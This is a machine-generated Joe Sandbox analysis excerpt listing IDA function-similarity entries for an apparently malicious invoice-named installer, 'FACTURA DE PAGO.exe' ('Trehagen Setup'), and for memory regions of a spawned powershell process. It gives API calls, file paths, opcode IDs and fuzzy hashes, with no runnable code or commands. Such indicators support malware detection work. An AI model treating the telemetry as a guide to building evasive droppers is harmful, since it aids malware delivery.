                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd
                                                                                        Similarity
                                                                                        • API ID: ItemTextlstrlenwsprintf
                                                                                        • String ID: %u.%u%s%s
                                                                                        • API String ID: 3540041739-3551169577
                                                                                        • Opcode ID: 1472cf9e36570b38fa99e832c46bb30f5d20a58f0764e004e3f2a6e79c89f0d0
                                                                                        • Instruction ID: 053aaa49463ee093dad042f908cd6657d31450f6c5b0c7846562dfb37f065ee1
                                                                                        • Opcode Fuzzy Hash: 1472cf9e36570b38fa99e832c46bb30f5d20a58f0764e004e3f2a6e79c89f0d0
                                                                                        • Instruction Fuzzy Hash: 0E11E473A041283BDB0065A99C45EAF3288DB82374F254237FA25F71D1EA78CC1286A8
                                                                                        APIs
                                                                                        • SetWindowTextA.USER32(00000000,Trehagen Setup), ref: 00403A0C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd
                                                                                        Similarity
                                                                                        • API ID: TextWindow
                                                                                        • String ID: "C:\Users\user\Desktop\FACTURA DE PAGO.exe"$1033$Trehagen Setup
                                                                                        • API String ID: 530164218-764001135
                                                                                        • Opcode ID: c35f14d8ae607f964b1d366d12cd70842dee39e56cae11f13a59ba4c30930c7f
                                                                                        • Instruction ID: fbf6035dbb292e76ee93bcdc762ea67a79fb5cde0254510f453a1e05a67cff09
                                                                                        • Opcode Fuzzy Hash: c35f14d8ae607f964b1d366d12cd70842dee39e56cae11f13a59ba4c30930c7f
                                                                                        • Instruction Fuzzy Hash: 97110871B046109BC730AF56DC409737B6CEF89319368423FE801A73D1D639AD03CAA9
                                                                                        APIs
                                                                                        • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 004057A7
                                                                                        • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004030FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 004057B0
                                                                                        • lstrcatA.KERNEL32(?,00409014), ref: 004057C1
                                                                                        Strings
                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004057A1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd
                                                                                        Similarity
                                                                                        • API ID: CharPrevlstrcatlstrlen
                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                        • API String ID: 2659869361-3081826266
                                                                                        • Opcode ID: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
                                                                                        • Instruction ID: 31daa9478c60f2ec517fa6cf0afa0cd81b34b06dfe81de980877f4a94ee531a8
                                                                                        • Opcode Fuzzy Hash: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
                                                                                        • Instruction Fuzzy Hash: 8ED0A762505D306BE21226155C09D8B2A08CF12740B044027F100B61E1C63C4D414FFD
                                                                                        APIs
                                                                                        • DestroyWindow.USER32(00000000,00000000,00402DE2,00000001), ref: 00402C15
                                                                                        • GetTickCount.KERNEL32 ref: 00402C33
                                                                                        • CreateDialogParamA.USER32(0000006F,00000000,00402B7F,00000000), ref: 00402C50
                                                                                        • ShowWindow.USER32(00000000,00000005), ref: 00402C5E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                        • String ID:
                                                                                        • API String ID: 2102729457-0
                                                                                        • Opcode ID: 42481ae060c013658952b0ba65f2133d3ed78682e8b262a627202bc2b689c50f
                                                                                        • Instruction ID: 1b84634240e2166e3851fbc92cd381e461e1db94d3428fd6ef6110bf0b183a31
                                                                                        • Opcode Fuzzy Hash: 42481ae060c013658952b0ba65f2133d3ed78682e8b262a627202bc2b689c50f
                                                                                        • Instruction Fuzzy Hash: 97F05E30A09220EFD6317B20FE4CD9F7BA4BB04B15B404976F104B11EAC7782882CB9D
                                                                                        APIs
                                                                                          • Part of subcall function 00405D2F: lstrcpynA.KERNEL32(?,?,00000400,004031BD,Trehagen Setup,NSIS Error), ref: 00405D3C
                                                                                          • Part of subcall function 0040583A: CharNextA.USER32(?,?,0042AC70,?,004058A6,0042AC70,0042AC70,74DF3410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405848
                                                                                          • Part of subcall function 0040583A: CharNextA.USER32(00000000), ref: 0040584D
                                                                                          • Part of subcall function 0040583A: CharNextA.USER32(00000000), ref: 00405861
                                                                                        • lstrlenA.KERNEL32(0042AC70,00000000,0042AC70,0042AC70,74DF3410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058E2
                                                                                        • GetFileAttributesA.KERNEL32(0042AC70,0042AC70,0042AC70,0042AC70,0042AC70,0042AC70,00000000,0042AC70,0042AC70,74DF3410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,74DF3410,C:\Users\user\AppData\Local\Temp\), ref: 004058F2
                                                                                        Strings
                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 0040588F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd
                                                                                        Similarity
                                                                                        • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                        • API String ID: 3248276644-3081826266
                                                                                        • Opcode ID: db8bdf16e861f9482455b6e3180b19c0ec0d0437e7b2793ecf43ff70ccde9147
                                                                                        • Instruction ID: 9b9a112432e638448ae222c580828ae1e9a3246b43ea9c19d715dfb55d3aa95b
                                                                                        • Opcode Fuzzy Hash: db8bdf16e861f9482455b6e3180b19c0ec0d0437e7b2793ecf43ff70ccde9147
                                                                                        • Instruction Fuzzy Hash: 1CF0F427105D6156E622323A5C49A9F1A54CE86324718C53BFC50B22C2CA3C88639D7E
                                                                                        APIs
                                                                                        • FreeLibrary.KERNEL32(?,74DF3410,00000000,C:\Users\user\AppData\Local\Temp\,004035F2,0040340C,?), ref: 00403634
                                                                                        • GlobalFree.KERNEL32(00000000), ref: 0040363B
                                                                                        Strings
                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 0040361A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd
                                                                                        Similarity
                                                                                        • API ID: Free$GlobalLibrary
                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                        • API String ID: 1100898210-3081826266
                                                                                        • Opcode ID: dccbf9c36de3459267eb1af99735bed06c7a158201479be104942c1c24015bd8
                                                                                        • Instruction ID: 1a9bfca33d817e772708c534a1c0ef1eeb9da564593c1c7aee7843147688a1a4
                                                                                        • Opcode Fuzzy Hash: dccbf9c36de3459267eb1af99735bed06c7a158201479be104942c1c24015bd8
                                                                                        • Instruction Fuzzy Hash: 60E08C329050606BC6316F15ED04B2E76A9AB48B22F42006AEA407B3A08B756C424BCC
                                                                                        APIs
                                                                                        • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CD2,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\FACTURA DE PAGO.exe,C:\Users\user\Desktop\FACTURA DE PAGO.exe,80000000,00000003), ref: 004057EE
                                                                                        • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CD2,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\FACTURA DE PAGO.exe,C:\Users\user\Desktop\FACTURA DE PAGO.exe,80000000,00000003), ref: 004057FC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd
                                                                                        Similarity
                                                                                        • API ID: CharPrevlstrlen
                                                                                        • String ID: C:\Users\user\Desktop
                                                                                        • API String ID: 2709904686-224404859
                                                                                        • Opcode ID: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
                                                                                        • Instruction ID: 563d0c8124584ba78a4db43b9ec919a88ee2b9567cf051c7da1bb821b6b33a35
                                                                                        • Opcode Fuzzy Hash: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
                                                                                        • Instruction Fuzzy Hash: 48D0A773808D705FF34362109C04B8F6B48CF12740F094062E140A71D0C2780C414BBD
                                                                                        APIs
                                                                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405917
                                                                                        • lstrcmpiA.KERNEL32(00000000,00000000), ref: 0040592F
                                                                                        • CharNextA.USER32(00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405940
                                                                                        • lstrlenA.KERNEL32(00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405949
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd
                                                                                        Similarity
                                                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                                                        • String ID:
                                                                                        • API String ID: 190613189-0
                                                                                        • Opcode ID: d250403eeccc32afa1460bd507a63d74f6ad2c43926490d4129708a4008c1f50
                                                                                        • Instruction ID: 9438e9cad6691fea7f13f8d56426e11099e03f26c07faecbb185dc05f13043cf
                                                                                        • Opcode Fuzzy Hash: d250403eeccc32afa1460bd507a63d74f6ad2c43926490d4129708a4008c1f50
                                                                                        • Instruction Fuzzy Hash: D5F06236505518FFCB129FA5DC00D9EBBA8EF16360B2540B9F800F7350D674EE01ABA9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1896529515.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_bc0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 568c0eb38d8e4a976d544a13c5f944362fec100f38f3812ebe015c91f237023d
                                                                                        • Instruction ID: d856bc454682181fcd670ee864b84dec6cd26b58e941cc0f48620d7a980f6624
                                                                                        • Opcode Fuzzy Hash: 568c0eb38d8e4a976d544a13c5f944362fec100f38f3812ebe015c91f237023d
                                                                                        • Instruction Fuzzy Hash: 7C525C34A00319DFDB25DB64C894BADBBF2EF84344F1485AAD81AA7251EB30DD86CB51
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_7270000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
                                                                                        • API String ID: 0-3098030321
                                                                                        • Opcode ID: d0c83154d62ed1139083d592442368815c5492ca9fb700b085ffbf8b41104515
                                                                                        • Instruction ID: 4062efe56f42f2815e850f3eee70750927e65cd66013735b758a5ab9b6022b1a
                                                                                        • Opcode Fuzzy Hash: d0c83154d62ed1139083d592442368815c5492ca9fb700b085ffbf8b41104515
                                                                                        • Instruction Fuzzy Hash: 7E92ABB0B10309DFC714DB98C551F9ABBA2BF85304F608569D908AF755CBB2EC86CB91
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1914509095.0000000008BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08BD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_8bd0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                        • API String ID: 0-1262107880
                                                                                        • Opcode ID: d8e8eab5543c7c46c9bee3c903336929a42d5ce32349a867bbfa8ab6e616333d
                                                                                        • Instruction ID: 8928b8b1790beede572c9adfe172ff84c1231bb226c8d3053ee6751b64fd132f
                                                                                        • Opcode Fuzzy Hash: d8e8eab5543c7c46c9bee3c903336929a42d5ce32349a867bbfa8ab6e616333d
                                                                                        • Instruction Fuzzy Hash: D532C671B04708EFCB14EF68C445AAABBE2EF84311F1484AAD8059F755EB32DD46CB91
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_7270000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
                                                                                        • API String ID: 0-518715366
                                                                                        • Opcode ID: 882e5245ced19fde0eb8b24cd1dc0a7f1cbd96fb3d8a1e265d917816f7578b4d
                                                                                        • Instruction ID: c726af04cb76f18e6230731c062a5ffaaf3a824b34d05b5b4839864cb31d9701
                                                                                        • Opcode Fuzzy Hash: 882e5245ced19fde0eb8b24cd1dc0a7f1cbd96fb3d8a1e265d917816f7578b4d
                                                                                        • Instruction Fuzzy Hash: 627299B0A10345DFC710DB94C991F9ABBB2BF95304F648558D9086F792CBB2EC86CB91
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_7270000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'^q$4'^q$4'^q$4'^q$tP^q$tP^q
                                                                                        • API String ID: 0-445857065
                                                                                        • Opcode ID: abffd8c9e6e10dc3798d6cb61758768889fd6ac97cac899f4bdaae11489d3e38
                                                                                        • Instruction ID: 811d9f25fcde42614fc582682f05a894ef777a3528fc55455acf7bb8ab5f442b
                                                                                        • Opcode Fuzzy Hash: abffd8c9e6e10dc3798d6cb61758768889fd6ac97cac899f4bdaae11489d3e38
                                                                                        • Instruction Fuzzy Hash: 1C32CFB0B112099FD714CB98CA51FAABBF2AFC9314F148469E805AF751CB72EC45CB91
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1914509095.0000000008BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08BD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_8bd0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                                                        • API String ID: 0-3272787073
                                                                                        • Opcode ID: 9f43b7e7b8eddff4d463386438bfe30be44f70ab974642d68b2f755ca588243a
                                                                                        • Instruction ID: fb875ca845173d40a8279d88cd53f313a51ba0be95d75b19bcd0b4f88160b086
                                                                                        • Opcode Fuzzy Hash: 9f43b7e7b8eddff4d463386438bfe30be44f70ab974642d68b2f755ca588243a
                                                                                        • Instruction Fuzzy Hash: 27A1D531B04349EFCB249F69C44466ABBE2FF88312F1484EEE515CB265EB31D945CBA1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_7270000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                                                        • API String ID: 0-3272787073
                                                                                        • Opcode ID: ece80b56e8e5f93a5ab89d668f810b9059031e0e8fe172bbd25b693ce0a68cc7
                                                                                        • Instruction ID: bed70bf84deaffd39c6c3cedc8eb30bd99df5b13accc5944c69d559e4e17d09d
                                                                                        • Opcode Fuzzy Hash: ece80b56e8e5f93a5ab89d668f810b9059031e0e8fe172bbd25b693ce0a68cc7
                                                                                        • Instruction Fuzzy Hash: 697139B1B2021ACFCB349B79CA002ABBBA5EFC5610F14847AD905DB355DA31DA49C7E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_7270000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'^q$4'^q$$^q$$^q
                                                                                        • API String ID: 0-2049395529
                                                                                        • Opcode ID: b1b61d75f2508e85497d768307bad3adac93973331bb26dd27f8de3b3184dbc3
                                                                                        • Instruction ID: cc2f71e2542b77f49a9de5588740e97807e76291df11afe58ac9d138bdd1d34c
                                                                                        • Opcode Fuzzy Hash: b1b61d75f2508e85497d768307bad3adac93973331bb26dd27f8de3b3184dbc3
                                                                                        • Instruction Fuzzy Hash: 06628BB4A10219DFDB14DB58C941FAABBB2BB88304F10C499D908AF755CB72ED85CF91
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_7270000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                                        • API String ID: 0-1420252700
                                                                                        • Opcode ID: 78cbb70ebbec46720455335584ff3974b2abc6d14dbe43893ce058fb017b80a4
                                                                                        • Instruction ID: 2eef6ae29106c0e5b6922b63b115774fd8fdc7e983a3cae245b1c426c93a7052
                                                                                        • Opcode Fuzzy Hash: 78cbb70ebbec46720455335584ff3974b2abc6d14dbe43893ce058fb017b80a4
                                                                                        • Instruction Fuzzy Hash: 71E15AF1B2421B8FCB148B688A096ABBBE2AFC5314F14C47AD505CF755DB31C985C7A2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_7270000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                                        • API String ID: 0-1420252700
                                                                                        • Opcode ID: eefa8e9aa4c0ff0228dadfa5eb20b8879b90eb8dfb4c964f5329a222e0bc91ba
                                                                                        • Instruction ID: fe294ff3d5251466c007378bf89bf4182880f4ff13bc52263d20d4239f6a923a
                                                                                        • Opcode Fuzzy Hash: eefa8e9aa4c0ff0228dadfa5eb20b8879b90eb8dfb4c964f5329a222e0bc91ba
                                                                                        • Instruction Fuzzy Hash: 1DE1B1B0B1024ADFCB04DB68CA51B9EBBA3AF88304F15C569D4056F796CB71DC4ACB91
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1914509095.0000000008BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08BD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_8bd0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'^q$$^q$$^q
                                                                                        • API String ID: 0-2291298209
                                                                                        • Opcode ID: b56dfa182a900dae3c534c37d4bd8cf938ba935cc16c5df09a90b68f9fbd2f44
                                                                                        • Instruction ID: 00a53cfe673af252003a2339773f2a28935928769ef24dc18d0ce764847cfbce
